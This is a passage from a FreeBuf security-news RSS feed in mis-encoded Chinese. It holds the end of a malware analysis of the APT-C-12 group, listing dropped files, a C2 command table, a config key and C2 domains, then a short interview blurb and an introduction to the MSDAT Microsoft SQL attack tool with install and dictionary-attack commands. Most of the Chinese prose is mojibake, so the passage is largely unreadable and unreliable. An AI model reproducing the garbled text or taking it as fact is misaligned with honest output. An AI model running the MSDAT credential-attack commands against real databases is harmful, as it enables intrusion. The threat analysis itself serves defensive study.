893<p> å¦‚ä¸‹å›¾æ‰€ç¤ºè¯¥è¯±é¥µæ–‡ä»¶ä¼ªè£…æˆæ–‡ä»¶å¤¹çš„å›¾æ ‡ï¼Œæ‰§è¡ŒåŽä¼šæ‰“å¼€åŒ…å«æœ‰è¯±é¥µæ–‡æ¡£å’Œå›¾ç‰‡çš„æ–‡ä»¶å¤¹ï¼Œè€Œæ¤æ—¶å®žé™…çš„æ¶æ„è½½è·å·²ç»åœ¨åŽå°æ‰§è¡Œã€‚</p>
894<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323161665250.png" width="554" height="311"></p>
895<p> 当该诱饵文件è¿è¡Œæ—¶ï¼Œå…¶ä¼šè§£å¯†é‡Šæ”¾4个文件,其ä¸ä¸¤ä¸ªä¸ºä¸Šè¿°çš„诱导文档和图片,å¦å¤–ä¸ºä¸¤ä¸ªæ¶æ„çš„tmp文件。</p>
896<p><img alt="image.png" src="http://image.3001.net/images/20180723/153231618033.png!small" width="690" height="513"></p>
897<p> é‡Šæ”¾çš„æ¶æ„tmp文件路径为:</p>
898<p> %temp%\unicode32.tmp</p>
899<p> %appdata%\WinRAR\update.tmp</p>
900<p> 最åŽé€šè¿‡LoadLibraryWåŠ è½½é‡Šæ”¾çš„unicode32.tmp文件。</p>
901<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323161896505.png!small" width="690" height="28"></p>
902<h3>unicode32.tmp</h3>
903<p> unicode32.tmp为一个loader,其主è¦ç”¨äºŽåŠ è½½update.tmp,如下图所示其通过rundll32.exeåŠ è½½update.tmp,并调用其导出函数jj。</p>
904<p><img alt="image.png" src="http://image.3001.net/images/20180723/1532316199409.png!small" width="690" height="660"></p>
905<p> å½“åŠ è½½äº†update.tmpåŽï¼Œä¼šåˆ 除装载exeç¨‹åºæ–‡ä»¶å’Œè‡ªèº«ã€‚</p>
906<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162073863.png!small" width="690" height="304"></p>
907<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162145656.png!small" width="690" height="161"></p>
908<h3>update.tmp</h3>
909<p> 该文件为一个DLL,并有一个å为jj的导出函数。</p>
910<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162243979.png!small" width="690" height="124"></p>
911<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162311824.png!small" width="690" height="209"></p>
912<p> å…¶é¦–å…ˆä¼šå¯¹ç›®æ ‡ä¸»æœºè¿›è¡Œä¿¡æ¯æ”¶é›†ã€‚</p>
913<p>获å–系统版本信æ¯ï¼š</p>
914<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162392198.png!small" width="690" height="541"></p>
915<p>调用CreateToolhelp32Snapshot获å–系统进程信æ¯ï¼š</p>
916<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162486559.png!small" width="690" height="287"></p>
917<p>调用GetAdaptersInfo获å–网å¡MAC地å€ï¼š</p>
918<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162581447.png!small" width="690" height="201"></p>
919<p>判æ–当å‰ç³»ç»ŸçŽ¯å¢ƒæ˜¯32使ˆ–64ä½ï¼š</p>
920<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162652619.png!small" width="690" height="240"></p>
921<p>通过注册表获å–已安装的程åºä¿¡æ¯ï¼ŒèŽ·å–的安装程åºä¿¡æ¯åŠ ä¸Šå‰ç¼€â€ISLâ€æ ¼å¼åŒ–:</p>
922<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162735456.png!small" width="690" height="242"></p>
923<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323162893124.png!small" width="690" height="420"></p>
924<p>通过注册表获å–DisplayNameå’ŒDisplayVersion的信æ¯ï¼Œå¹¶å°†DisplayName å’ŒDisplayVersionæ ¼å¼åŒ–为â€%sâ€:{“NDâ€:â€%sâ€,â€DVâ€:â€%sâ€}。</p>
925<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163036749.png!small" width="690" height="119"></p>
926<p><img alt="image.png" src="http://image.3001.net/images/20180723/1532316307665.png!small" width="690" height="128">ä¿¡æ¯æ”¶é›†åŽä¼šé¦–å…ˆå‘远程控制æœåС噍å‘é€ä¸Šçº¿ä¿¡æ¯ã€‚</p>
927<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163187412.png!small" width="690" height="316"></p>
928<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163262352.png!small" width="690" height="223"></p>
929<p> 获å–tmp目录, 创建AdobeNW目录,并从控制æœåŠ¡å™¨ä¸Šä¸‹è½½AdobeUpdate.tmp作为第二阶段的载è·ï¼Œå…¶å®žé™…为一个DLL文件。</p>
930<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163348026.png!small" width="690" height="269"></p>
931<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163423134.png!small" width="690" height="304"></p>
932<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163497013.png!small" width="690" height="173"></p>
933<p> 最终调用rundll32å¯åЍDLL文件的导出函数MainFun,如果进程创建æˆåŠŸç»™æœåŠ¡å™¨è¿”å›žä¿¡æ¯ã€‚</p>
934<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163571605.png!small" width="690" height="130"></p>
935<h3>AdobeUpdate.tmp</h3>
936<p> AdobeUpdate.tmp为DLL文件,其导出方法MainFun由第一阶段木马DLL调用执行。</p>
937<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163669843.png!small" width="690" height="236"></p>
938<p> 其首先é历%USERPROFILE%\AppData路径下tmpåŽç¼€æ–‡ä»¶ï¼Œå¹¶åˆ 除。</p>
939<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163766026.png!small" width="690" height="633"></p>
940<p> ç„¶åŽä»Žæ–‡ä»¶è‡ªèº«å°¾éƒ¨è¯»å–é…置信æ¯å¹¶è§£å¯†ï¼Œå…¶æ ¼å¼å¦‚下:</p>
941<p> åŠ å¯†çš„é…置信æ¯ï¼ŒåŒ…æ‹¬æ ‡è¯†ID,控制æœåŠ¡å™¨åœ°å€ï¼ŒåР坆IVå’ŒKEY,以åŠMutexä¿¡æ¯ï¼›</p>
942<p> 4å—èŠ‚åŠ å¯†é…置信æ¯é•¿åº¦ï¼›</p>
943<p> 17å—节解密密钥;</p>
944<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163887262.png!small" width="690" height="215"></p>
945<p> 例如上图所示的解密é…置文件的KEY为sobcsnkciatwiffi,其解密算法如下:</p>
946<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323163962540.png!small" width="690" height="274"></p>
947<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164061692.png!small" width="690" height="393"></p>
948<p> 解密之åŽçš„é…置文件如下所示:</p>
949<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164153662.png!small" width="690" height="196"></p>
950<p> 查询HKEY_CURRENT_USER下的MyAppæ³¨å†Œè¡¨æŸ¥çœ‹æ˜¯å¦æœ‰FirstExec, 通过å—符串â€noâ€æ¥åˆ¤æ–该DLLæ˜¯å¦æ˜¯ç¬¬ä¸€æ¬¡æ‰§è¡Œã€‚</p>
951<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164212876.png!small" width="690" height="170"></p>
952<p> è‹¥DLLä¸ä¸ºé¦–æ¬¡æ‰§è¡Œï¼Œåˆ™è½®è¯¢èŽ·å–æŽ§åˆ¶æœåŠ¡å™¨å‘½ä»¤ï¼Œå¦åˆ™é历ç£ç›˜C:到F:ä¸çš„æ–‡æ¡£æ–‡ä»¶ä¿¡æ¯ï¼Œå¹¶ä¿å˜åœ¨temp文件夹下的list_tmp.txtä¸ã€‚</p>
953<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164281402.png!small" width="690" height="437"></p>
954<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164399584.png!small" width="690" height="385"></p>
955<p> 其䏿Ÿ¥æ‰¾çš„æ–‡æ¡£ç±»åž‹åŒ…括.ppt .pptx .pdf.xls .xlsx .doc .docx .txt .wps .rtf的文档,将文档文件路径ã€åˆ›å»ºæ—¶é—´ä»¥åŠæ–‡ä»¶å¤§å°ä¿¡æ¯è¿›è¡Œä¿å˜ã€‚</p>
956<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164496291.png!small" width="690" height="337"></p>
957<p> ä¸‹å›¾ä¸ºç¤ºä¾‹çš„å†™å…¥æ•°æ®æ ¼å¼(文件路径 创建时间文件大å°):</p>
958<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164578699.png!small" width="690" height="121"></p>
959<p> å¹¶å°†list_tmp.txt进行aesåŠ å¯†åŽä¸Šä¼ 到控制æœåŠ¡å™¨ï¼š</p>
960<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164643621.png!small" width="690" height="270"></p>
961<p> 接ç€è®¾ç½®æ³¨å†Œè¡¨FirstExecæ ‡å¿—ï¼š</p>
962<p><img alt="image.png" src="http://image.3001.net/images/20180723/1532316477703.png!small" width="690" height="124"></p>
963<p> AdobeUpdate.dll木马实现了丰富的命令控制指令,其通过访问控制域å获å–åŒ…å«æœ‰æŽ§åˆ¶å‘½ä»¤çš„æ–‡ä»¶ï¼Œå¹¶åœ¨æœ¬åœ°è§£å¯†è§£æžåŽæ‰§è¡Œã€‚</p>
964<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323164865195.png!small" width="690" height="687"></p>
965<p> 其指令以***和对应指令数å—组æˆï¼Œä»¥ä¸‹ä¸ºæŽ§åˆ¶æŒ‡ä»¤åŠŸèƒ½åˆ—è¡¨ï¼š</p>
966<div class="simditor-table">
967<div class="simditor-resize-handle"></div>
968</div>
969<table>
970<colgroup>
971<col>
972<col> </colgroup>
973<thead>
974<tr>
975<th> <b>***1</b> </th>
976<th> 执行cmd命令 </th>
977</tr>
978</thead>
979<tbody>
980<tr>
981<td> <b>***2</b> </td>
982<td> æ›´æ–°AppNameé…ç½® </td>
983</tr>
984<tr>
985<td> <b>***3</b> </td>
986<td> æ–‡ä»¶ä¸Šä¼ </td>
987</tr>
988<tr>
989<td> <b>***4</b> </td>
990<td> 文件下载 </td>
991</tr>
992<tr>
993<td> <b>***5</b> </td>
994<td> 更新控制域å </td>
995</tr>
996<tr>
997<td> <b>***7</b> </td>
998<td> ä¸Šä¼ æ–‡æ¡£æ–‡ä»¶åˆ—è¡¨ä¿¡æ¯ </td>
999</tr>
1000<tr>
1001<td> <b>***8</b> </td>
1002<td> 执行dll文件或exe </td>
1003</tr>
1004<tr>
1005<td> <b>***9</b> </td>
1006<td> æ–‡ä»¶åˆ é™¤ </td>
1007</tr>
1008<tr>
1009<td> <b>***10</b> </td>
1010<td> 指定文件列表信æ¯ä¸Šä¼ </td>
1011</tr>
1012<tr>
1013<td> <b>***11</b> </td>
1014<td> ä¿ç•™ </td>
1015</tr>
1016</tbody>
1017</table>
1018<h2>控制基础设施</h2>
1019<p> APT-C-12组织近期活动ä¸ä½¿ç”¨çš„æ¶æ„代ç 利用了applinzi.com域å下的二级域å作为控制域å,该域å为Sina App Engine的云æœåŠ¡æ‰˜ç®¡ã€‚</p>
1020<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323165087113.png!small" width="318" height="176"></p>
1021<p> 我们测试注册了SAE的账户,其默认创建应用å¯ä»¥å…费使用å多天,并支æŒå¤šç§å¼€å‘è¯è¨€çš„环境部署。</p>
1022<p><img alt="image.png" src="http://image.3001.net/images/20180723/153231652382.png!small" width="526" height="251"></p>
1023<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323165331299.png!small" width="397" height="209"><img alt="image.png" src="http://image.3001.net/images/20180723/153231654024.png!small" width="629" height="315"></p>
1024<p> 我们å°è¯•对其控制æœåŠ¡å™¨è¿›è¡Œè¿žæŽ¥ï¼Œä½†å…¶åŽå°å¤„ç†ç¨‹åºå·²ç»å‡ºé”™ï¼Œé€šè¿‡è¿”å›žçš„é”™è¯¯ä¿¡æ¯æˆ‘们å¯ä»¥å‘现该组织使用Python部署的åŽå°åº”用,并使用了flask作为其WebæœåŠ¡å®žçŽ°ã€‚</p>
1025<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323165489628.png!small" width="900" height="396"></p>
1026<h3>SAE控制åè®®</h3>
1027<p> 该组织针对SAE的部署应用实现了一套访问å议,其分为put,info,get,del四个功能。</p>
1028<p> å…¶ä¸putç”¨äºŽä¸Šä¼ æ–‡ä»¶ï¼š</p>
1029<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323165939137.png!small" width="690" height="285"></p>
1030<p> getç”¨äºŽèŽ·å–æ–‡ä»¶ï¼š</p>
1031<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323166002751.png!small" width="690" height="148"></p>
1032<p> info用于获å–ä¿¡æ¯ï¼š</p>
1033<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323166063453.png!small" width="690" height="417"></p>
1034<p> delç”¨äºŽåˆ é™¤æ–‡ä»¶ï¼š</p>
1035<p><img alt="image.png" src="http://image.3001.net/images/20180723/15323166145883.png!small" width="634" height="522"></p>
1036<h2>总结</h2>
1037<p> ç»§360å¨èƒæƒ…报ä¸å¿ƒå‘现该组织利用Digital Ocean云æœåŠ¡ä½œä¸ºå‘½ä»¤æŽ§åˆ¶å’Œå›žä¼ é€šä¿¡æ¸ é“以åŽï¼Œæˆ‘们åˆå‘现该组织使用国内的云æœåŠ¡SAEæž„å»ºå…¶æŽ§åˆ¶å›žä¼ åŸºç¡€è®¾æ–½ï¼Œåˆ©ç”¨è¿™ç§æ–¹å¼ä¸€å®šç¨‹åº¦ä¸Šå‡å°‘äº†æ”»å‡»åˆ©ç”¨çš„æˆæœ¬ï¼Œä¹Ÿå¢žåŠ äº†åˆ†æžå›žæº¯çš„难度。</p>
1038<h2>IOC</h2>
1039<p>crecg.applinzi.com</p>
1040<p>costbank.applinzi.com</p>
1041<h2>å‚考链接</h2>
1042<p><a href="https://sae.sina.com.cn/" ref="">https://sae.sina.com.cn/</a></p>
1043<h2>原文链接:</h2>
1044<p><a href="https://ti.360.net/blog/articles/latest-sample-and-c2-mechanism-of-apt-c-12/">https://ti.360.net/blog/articles/latest-sample-and-c2-mechanism-of-apt-c-12/</a> </p>
1045<p><b style="color: rgb(159, 163, 168);">*本文作者:360天眼实验室,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1046]]></content:encoded>
1047 <wfw:commentRss>http://www.freebuf.com/articles/system/178422.html/feed</wfw:commentRss>
1048 <slash:comments>3</slash:comments>
1049 </item>
1050 <item>
1051 <title>ã€FreeBufå—幕组】HackerOne优秀白帽黑客采访系列-Alyssa Herrera</title>
1052 <link>http://www.freebuf.com/video/178627.html</link>
1053 <comments>http://www.freebuf.com/video/178627.html#comments</comments>
1054 <pubDate>Wed, 25 Jul 2018 07:05:04 +0000</pubDate>
1055 <dc:creator>willhuang</dc:creator>
1056 <category><![CDATA[视频]]></category>
1057 <category><![CDATA[Alyssa Herrera]]></category>
1058 <category><![CDATA[FreeBufå—幕组]]></category>
1059 <category><![CDATA[HackerOne]]></category>
1060 <category><![CDATA[白帽采访]]></category>
1061
1062 <guid isPermaLink="false">http://www.freebuf.com/?p=178627</guid>
1063 <description><![CDATA[äººç‰©ä»‹ç» Alyssa Herrera,自从16å²æŽ¥è§¦åˆ°æ¼æ´žä¼—测之åŽï¼Œå°±çˆ±ä¸Šäº†è¿™ä¸ªè¡Œä¸šã€‚作为众测社区为数ä¸å¤šçš„女性白帽,Alyssa Herreraçš„æ¼æ´žå‘现æˆå°±æžå…·ä»£è¡¨æ€§ï¼Œåœ¨ç¾Žå›½å›½é˜²éƒ¨â€œHack The Pentagonâ€æ¼æ´žä¼—测项目ä¸ï¼Œå¥¹ä»¥å¤šä¸ªé«˜å±æ¼æ´žå’Œ50å¤šä¸ªæ¼æ´žå‘现é‡çš„优异æˆç»©ï¼Œè·»èº«æŽ’行榜第八,她分享的《æå¼€é¢çº±ï¼šåˆ©ç”¨SSRFæ¼æ´žå®žçŽ°ç¾Žå›½å›½é˜²éƒ¨NIPRNet访问》广å—好评。å¦å¤–,Alyssaè¿˜æ˜¯å¼€æºæ¼æ´žä¼—测社区OpenBugBounty多达1500å¤šä¸ªæ¼æ´žä¸ŠæŠ¥è€…,以åŠAT&T公叿¼æ´žåäººå ‚èŽ·å¾—è€…ã€‚ ç›®å‰ï¼ŒAlyssa为Synackå…¬å¸çš„Red Team工作,主è¦å·¥ä½œä¸ºå®¢æˆ·åނ商æä¾›é£Žé™©è¯„ä¼°ã€æ¸—逿µ‹è¯•å’Œæ¼æ´žåŠ å›ºã€‚åœ¨H1-415黑客大赛ä¸ï¼Œæˆ‘们一起æ¥å¬å¬Alyssa Herreraçš„ç»éªŒåˆ†äº«ã€‚ 观看视频 看ä¸åˆ°è§†é¢‘点这里 演讲PPT: 《æå¼€é¢çº±ï¼šåˆ©ç”¨SSRFæ¼æ´žå®žçŽ°ç¾Žå›½å›½é˜²éƒ¨NIPRNet访问》 *本课程翻译自Youtube精选系列教程,喜欢的点一波关注(æ¯å‘¨æ›´æ–°ï¼‰ï¼ * 本文作者:willhuang,FreeBuf视频组è£èª‰å‡ºå“,转载须注明æ¥è‡ªFreeBuf.COM]]></description>
1064 <content:encoded><![CDATA[<h2>人物介ç»</h2>
1065<p><b style="color: rgb(0, 176, 80);">Alyssa Herrera,自从16å²æŽ¥è§¦åˆ°æ¼æ´žä¼—测之åŽï¼Œå°±çˆ±ä¸Šäº†è¿™ä¸ªè¡Œä¸šã€‚作为众测社区为数ä¸å¤šçš„女性白帽,Alyssa Herreraçš„æ¼æ´žå‘现æˆå°±æžå…·ä»£è¡¨æ€§ï¼Œåœ¨ç¾Žå›½å›½é˜²éƒ¨â€œHack The Pentagonâ€æ¼æ´žä¼—测项目ä¸ï¼Œå¥¹ä»¥å¤šä¸ªé«˜å±æ¼æ´žå’Œ50å¤šä¸ªæ¼æ´žå‘现é‡çš„优异æˆç»©ï¼Œè·»èº«æŽ’行榜第八,她分享的《æå¼€é¢çº±ï¼šåˆ©ç”¨SSRFæ¼æ´žå®žçŽ°ç¾Žå›½å›½é˜²éƒ¨NIPRNet访问》广å—好评。å¦å¤–,Alyssaè¿˜æ˜¯å¼€æºæ¼æ´žä¼—测社区OpenBugBounty多达1500å¤šä¸ªæ¼æ´žä¸ŠæŠ¥è€…,以åŠAT&T公叿¼æ´žåäººå ‚èŽ·å¾—è€…ã€‚</b></p>
1066<p><b style="color: rgb(0, 176, 80);">ç›®å‰ï¼ŒAlyssa为Synackå…¬å¸çš„Red Team工作,主è¦å·¥ä½œä¸ºå®¢æˆ·åނ商æä¾›é£Žé™©è¯„ä¼°ã€æ¸—逿µ‹è¯•å’Œæ¼æ´žåŠ å›ºã€‚åœ¨H1-415黑客大赛ä¸ï¼Œæˆ‘们一起æ¥å¬å¬Alyssa Herreraçš„ç»éªŒåˆ†äº«ã€‚</b></p>
1067<p><b style="color: rgb(0, 176, 80);"></b></p>
1068</p>
1069<h2><b style="color: rgb(51, 51, 51);">观看视频</b></h2>
1070<p style="text-align: center;"><b style="color: rgb(0, 176, 80);"> <iframe frameborder="0" width="640" height="498" src="https://v.qq.com/iframe/player.html?vid=l073376dtab&tiny=0&auto=0"></iframe></b></p>
1071<p style="text-align: center;"><b style="color: rgb(0, 176, 80);"><b style="color: rgb(0, 176, 80);">看ä¸åˆ°è§†é¢‘<a href="https://v.qq.com/x/page/l073376dtab.html" target="_blank">点这里</a></b></b></p>
1072<h2><b>演讲PPT:</b></h2>
1073<blockquote><p><a href="https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a">《æå¼€é¢çº±ï¼šåˆ©ç”¨SSRFæ¼æ´žå®žçŽ°ç¾Žå›½å›½é˜²éƒ¨NIPRNet访问》</a></p>
1074</blockquote>
1075<h3><span style="color: rgb(0, 176, 80);"><b>*本课程翻译自Youtube精选系列教程,喜欢的点一波关注(æ¯å‘¨æ›´æ–°ï¼‰ï¼</b><br /></span></h3>
1076<p><b style="color: rgb(0, 176, 80);"></b></p>
1077<p><b style="color: rgb(0, 176, 80);"><b style="color: rgb(0, 176, 80);"><b style="color: rgb(159, 163, 168);">* 本文作者:willhuang,FreeBuf视频组è£èª‰å‡ºå“,转载须注明æ¥è‡ªFreeBuf.COM</b></b> </b></p>
1078]]></content:encoded>
1079 <wfw:commentRss>http://www.freebuf.com/video/178627.html/feed</wfw:commentRss>
1080 <slash:comments>4</slash:comments>
1081 </item>
1082 <item>
1083 <title>MSDAT:一款专门针对Microsoft SQLæ•°æ®åº“çš„æ¸—é€æµ‹è¯•工具</title>
1084 <link>http://www.freebuf.com/sectool/177187.html</link>
1085 <comments>http://www.freebuf.com/sectool/177187.html#comments</comments>
1086 <pubDate>Wed, 25 Jul 2018 07:00:59 +0000</pubDate>
1087 <dc:creator>Alpha_h4ck</dc:creator>
1088 <category><![CDATA[工具]]></category>
1089 <category><![CDATA[MSDAT]]></category>
1090 <category><![CDATA[SQLæ•°æ®åº“]]></category>
1091 <category><![CDATA[æ¸—é€æµ‹è¯•]]></category>
1092
1093 <guid isPermaLink="false">http://www.freebuf.com/?p=177187</guid>
1094 <description><![CDATA[今天给大家介ç»çš„æ˜¯ä¸€æ¬¾åå«MSDAT(Microsoft SQL Database Attacking Tool)的工具,MSDAT是一款开æºçš„æ¸—逿µ‹è¯•å·¥å…·ï¼Œç ”ç©¶äººå‘˜å¯åˆ©ç”¨MSDATæ¥å¯¹Microsoft SQLæ•°æ®åº“的安全性进行远程测试。 MSDAT使用场景: 有一个需è¦è¿œç¨‹ç›‘å¬çš„Microsoftæ•°æ®åº“ï¼Œä½ æƒ³è¦æ‰¾åˆ°å¯ä»¥ç”¨æ¥è·Ÿè¿™ä¸ªæ•°æ®åº“连接的有效å‡è¯ ä½ æ‹¿åˆ°äº†ä¸€ä¸ªæœ‰æ•ˆçš„è¿žæŽ¥å‡è¯ï¼Œä½ æƒ³è¦æå‡è¯¥è´¦å·çš„æƒé™ ä½ æ‹¿åˆ°äº†ä¸€ä¸ªæœ‰æ•ˆçš„è¿žæŽ¥å‡è¯ï¼Œä½ 想è¦åœ¨æ‰˜ç®¡è¯¥æ•°æ®åº“的主机上执行命令(xp_cmdshell) 注:该工具已在Microsoft SQL Database 2005ã€2008å’Œ2012版本上æˆåŠŸæµ‹è¯•ã€‚ åŠŸèƒ½ä»‹ç» åœ¨MSDATçš„å¸®åŠ©ä¸‹ï¼Œä½ å¯ä»¥å®žçŽ°ä»¥ä¸‹ç›®æ ‡ï¼š -åœ¨æ— éœ€é€šè¿‡èº«ä»½éªŒè¯çš„æƒ…况下获å–ç›®æ ‡MSSQLæ•°æ®åº“的技术信æ¯ï¼ˆä¾‹å¦‚æ•°æ®åº“版本); -通过å—典攻击æœç´¢MSSQLè´¦å·ï¼› -测试登录å‡è¯ï¼› -拿到数æ®åº“æœåŠ¡å™¨çš„Windows shell(xp_cmdshell); -远程下载/ä¸Šä¼ æ–‡ä»¶ï¼› -获å–SMBå‡è¯ï¼› -窃å–MSSQL哈希密ç ï¼› -æ‰«ææ•°æ®åº“端å£ï¼› -远程执行SQL请求; -获å–主机文件/目录; -创建文件夹; 工具安装 在è¿è¡ŒMSDAT之å‰ï¼Œä½ 需è¦å®‰è£…æŸäº›ä¾èµ–组件。 Ubuntu: sudo apt-get install freetds-dev 或直接从http://www.freetds.org/下载: sudo pip install cython colorlog termcolor pymssql argparse sudo pip install argcomplete && sudo activate-global-python-argcomplete 在freetdsé…置文件(/etc/freetds/freetds.conf或/usr/local/etc/freetds.conf)䏿·»åŠ ”usentlmv2 = yes”,例如: [global]         # TDS protocol version         tds version = 8.0         use ntlmv2 = yes ä½¿ç”¨æ ·ä¾‹ èŽ·å–æ‰€æœ‰æ¨¡å—: ./msdat.py -h åˆ—ä¸¾æ¨¡å—æ‰€æœ‰åŠŸèƒ½å’Œé€‰é¡¹ï¼ˆä¾‹å¦‚ï¼šall): ./msdat.py all -h æ³¨ï¼šä½ å¯ä»¥ä½¿ç”¨â€œ–test-moduleâ€œé€‰é¡¹æ¥æŸ¥çœ‹ç‰¹å®šæ¨¡å—是å¦é€‚ç”¨äºŽç›®æ ‡MSSQLæ•°æ®åº“。 allæ¨¡å— all模å—å¯ä»¥ç›´æŽ¥è¿è¡ŒMSDAT的所有模å—: python msdat.py all -s $SERVER 下é¢å‘½ä»¤å¯ä»¥å®žçŽ°ï¼š -利用å—典攻击测试å¸å·å‡è¯ï¼› -æµ‹è¯•ç›®æ ‡è´¦å·çš„密ç ï¼› -定义timeout值; ./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10--force-retry […]]]></description>
1095 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);">今天给大家介ç»çš„æ˜¯ä¸€æ¬¾åå«MSDAT(Microsoft SQL Database Attacking Tool)的工具,MSDAT是一款开æºçš„æ¸—逿µ‹è¯•å·¥å…·ï¼Œç ”ç©¶äººå‘˜å¯åˆ©ç”¨MSDATæ¥å¯¹Microsoft SQLæ•°æ®åº“的安全性进行远程测试。</b></p>
1096<p><img alt="1.png" src="http://image.3001.net/images/20180711/15312425795923.png!small" width="690" height="323"></p>
1097<h3>MSDAT使用场景:</h3>
1098<blockquote><p>有一个需è¦è¿œç¨‹ç›‘å¬çš„Microsoftæ•°æ®åº“ï¼Œä½ æƒ³è¦æ‰¾åˆ°å¯ä»¥ç”¨æ¥è·Ÿè¿™ä¸ªæ•°æ®åº“连接的有效å‡è¯</p>
1099<p>ä½ æ‹¿åˆ°äº†ä¸€ä¸ªæœ‰æ•ˆçš„è¿žæŽ¥å‡è¯ï¼Œä½ æƒ³è¦æå‡è¯¥è´¦å·çš„æƒé™</p>
1100<p>ä½ æ‹¿åˆ°äº†ä¸€ä¸ªæœ‰æ•ˆçš„è¿žæŽ¥å‡è¯ï¼Œä½ 想è¦åœ¨æ‰˜ç®¡è¯¥æ•°æ®åº“的主机上执行命令(xp_cmdshell)</p>
1101</blockquote>
1102<p>注:该工具已在Microsoft SQL Database 2005ã€2008å’Œ2012版本上æˆåŠŸæµ‹è¯•ã€‚</p>
1103<h2>功能介ç»</h2>
1104<p>在MSDATçš„å¸®åŠ©ä¸‹ï¼Œä½ å¯ä»¥å®žçŽ°ä»¥ä¸‹ç›®æ ‡ï¼š</p>
1105<p>-åœ¨æ— éœ€é€šè¿‡èº«ä»½éªŒè¯çš„æƒ…况下获å–ç›®æ ‡MSSQLæ•°æ®åº“的技术信æ¯ï¼ˆä¾‹å¦‚æ•°æ®åº“版本);</p>
1106<p>-通过å—典攻击æœç´¢MSSQLè´¦å·ï¼›</p>
1107<p>-测试登录å‡è¯ï¼›</p>
1108<p>-拿到数æ®åº“æœåŠ¡å™¨çš„Windows shell(xp_cmdshell);</p>
1109<p>-远程下载/ä¸Šä¼ æ–‡ä»¶ï¼›</p>
1110<p>-获å–SMBå‡è¯ï¼›</p>
1111<p>-窃å–MSSQL哈希密ç ï¼›</p>
1112<p>-æ‰«ææ•°æ®åº“端å£ï¼›</p>
1113<p>-远程执行SQL请求;</p>
1114<p>-获å–主机文件/目录;</p>
1115<p>-创建文件夹;</p>
1116<h2>工具安装</h2>
1117<p>在è¿è¡ŒMSDAT之å‰ï¼Œä½ 需è¦å®‰è£…æŸäº›ä¾èµ–组件。</p>
1118<p>Ubuntu:</p>
1119<pre><code>sudo apt-get install freetds-dev</code></pre>
1120<p>或直接从<a href="http://www.freetds.org/">http://www.freetds.org/</a>下载:</p>
1121</p>
1122<pre><code>sudo pip install cython colorlog termcolor pymssql argparse
1123sudo pip install argcomplete && sudo activate-global-python-argcomplete</code></pre>
1124<p>在freetdsé…置文件(/etc/freetds/freetds.conf或/usr/local/etc/freetds.conf)䏿·»åŠ ”usentlmv2 = yes”,例如: </p>
1125</p>
1126<pre><code>[global]
1127 # TDS protocol version
1128 tds version = 8.0
1129 use ntlmv2 = yes</code></pre>
1130</p>
1131<h2>ä½¿ç”¨æ ·ä¾‹</h2>
1132<p>èŽ·å–æ‰€æœ‰æ¨¡å—:</p>
1133<pre><code>./msdat.py -h</code></pre>
1134<p>åˆ—ä¸¾æ¨¡å—æ‰€æœ‰åŠŸèƒ½å’Œé€‰é¡¹ï¼ˆä¾‹å¦‚ï¼šall):</p>
1135<pre><code>./msdat.py all -h</code></pre>
1136<p>æ³¨ï¼šä½ å¯ä»¥ä½¿ç”¨â€œ–test-moduleâ€œé€‰é¡¹æ¥æŸ¥çœ‹ç‰¹å®šæ¨¡å—是å¦é€‚ç”¨äºŽç›®æ ‡MSSQLæ•°æ®åº“。</p>
1137<h3>all模å—</h3>
1138<p>all模å—å¯ä»¥ç›´æŽ¥è¿è¡ŒMSDAT的所有模å—:</p>
1139<pre><code>python msdat.py all -s $SERVER</code></pre>
1140<p>下é¢å‘½ä»¤å¯ä»¥å®žçŽ°ï¼š</p>
1141<p>-利用å—典攻击测试å¸å·å‡è¯ï¼›</p>
1142<p>-æµ‹è¯•ç›®æ ‡è´¦å·çš„密ç ï¼›</p>
1143<p>-定义timeout值;</p>
1144<pre><code>./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10--force-retry</code></pre>
1145<p>注:在æ¯ä¸€ä¸ªæ¨¡å—ä¸ï¼Œä½ å¯ä»¥åˆ©ç”¨â€œ–charset“选项æ¥ä¹‰æ‰€è¦ä½¿ç”¨çš„å—符集。</p>
1146<h3>mssqlinfo模å—</h3>
1147<p>åœ¨æ— éœ€é€šè¿‡èº«ä»½éªŒè¯çš„æƒ…况下获å–ç›®æ ‡MSSQLæ•°æ®åº“的技术信æ¯ï¼š</p>
